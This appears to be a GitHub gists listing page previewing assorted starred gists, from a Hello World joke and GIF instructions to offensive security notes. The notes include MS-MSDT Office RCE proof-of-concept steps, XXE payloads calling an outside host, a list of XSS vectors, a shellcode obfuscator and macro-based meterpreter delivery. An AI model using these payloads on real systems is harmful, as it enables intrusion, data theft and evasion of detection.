Skip to content

Instantly share code, notes, and snippets.

View galaris's full-sized avatar
🏠
Y29udGFjdEBkb21pbmlrYW50YWwubWU=

Dominik Antal galaris

🏠
Y29udGFjdEBkb21pbmlrYW50YWwubWU=
568 followers · 5.9k following
View GitHub Profile
@lolzballs
lolzballs / HelloWorld.java
Created March 22, 2015 00:21
Hello World Enterprise Edition
import java.io.FileDescriptor;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.OutputStream;
import java.io.PrintStream;
public class HelloWorld{
private static HelloWorld instance;
public static void main(String[] args){
instantiateHelloWorldMainClassAndRun();
@dergachev
dergachev / GIF-Screencast-OSX.md
Last active April 19, 2024 11:00
OS X Screencast to animated GIF

OS X Screencast to animated GIF

This gist shows how to create a GIF screencast using only free OS X tools: QuickTime, ffmpeg, and gifsicle.

Screencapture GIF

Instructions

To capture the video (filesize: 19MB), using the free "QuickTime Player" application:

@tothi
tothi / ms-msdt.MD
Last active April 18, 2024 02:22
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@amgine
amgine / WindowsMessage.cs
Created April 16, 2012 02:02
All windows messages as C# enum
namespace NAMESPACE
{
public enum WindowsMessage
{
WM_NULL = 0x0000,
WM_CREATE = 0x0001,
WM_DESTROY = 0x0002,
WM_MOVE = 0x0003,
WM_SIZE = 0x0005,
WM_ACTIVATE = 0x0006,
@staaldraad
staaldraad / XXE_payloads
Last active April 7, 2024 14:26
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@rmondello
rmondello / gist:b933231b1fcc83a7db0b
Last active April 5, 2024 07:10
Exporting (iCloud) Keychain and Safari credentials to a CSV file

Exporting (iCloud) Keychain and Safari credentials to a CSV file

Update (October 2021)

Exporting password + one-time code data from iCloud Keychain is now officially supported in macOS Monterey and Safari 15 (for Monterey, Big Sur, and Catalina). You can access it in the Password Manager’s “gear” icon (System Preferences > Passwords on Monterey, and Safari > Passwords everywhere else), or via the File > Export > Passwords... menu item). You shouldn't need to hack up your own exporter anymore.

Original, Obsolete Content (2014)

After my dad died, I wanted to be able to have access any of his online accounts going forward. My dad was a Safari user and used iCloud Keychain to sync his credentials across his devices. I don’t want to have to keep an OS X user account around just to access his accounts, so I wanted to export his credentials to a portable file.

@JohannesHoppe
JohannesHoppe / 666_lines_of_XSS_vectors.html
Created May 20, 2013 13:38
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@OtterHacker
OtterHacker / bin2c.py
Last active February 3, 2024 18:42
"""
Transform a binary file into a C header file.
The binary file is splitted into 16 char strings and rebuild at execution time.
The function buildsc() must be called in your main to rebuild the binary file into the sc C variable.
The length is set in the sc_length variable.
Be carefull, try to avoid compiler code optimization as it will remove all these modifications in the final binary.
"""
@mgeeky
mgeeky / Various-Macro-Based-RCEs.md
Last active January 14, 2024 16:43
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address: 192.168.56.101.

List:

  1. Page substiution macro for luring user to click Enable Content
  2. The Unicorn Powershell based payload
@JorgeGT
JorgeGT / plotRTL1090.matlab
Last active October 18, 2023 07:56
3D visualization of air traffic through RTL-SDR and MATLAB
%% PlotRTL1090
% 3D visualization of air traffic through RTL-SDR (dump1090) and MATLAB
% Copyright (C) 2014 Jorge Garcia Tiscar
%
% This program is free software: you can redistribute it and/or modify
% it under the terms of the GNU General Public License as published by
% the Free Software Foundation; either version 3 of the License, or
% (at your option) any later version (see LICENSE).
%% Initialize